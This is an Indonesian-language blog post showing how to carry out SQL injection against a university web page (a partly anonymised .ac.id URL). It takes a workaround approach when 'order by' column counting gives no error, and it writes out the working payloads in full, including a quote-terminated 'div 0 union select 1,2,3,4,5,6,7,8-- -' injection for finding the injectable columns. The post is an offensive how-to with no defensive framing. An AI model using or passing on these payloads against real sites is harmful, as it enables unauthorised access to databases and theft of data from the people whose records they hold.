Subscribe:

Ads 468x60px

Rabu, 26 Februari 2014

SQL Injection 'order by 10000' and still not error?


assalamualaikum
okay sesuai judul
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak mengkasilakan apa2

target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2












coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya













wew pas di kecilin muncul lagi tulisan nya














berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya













coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -













dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya

udah gitu aja, semoga bermanfaat

1 komentar: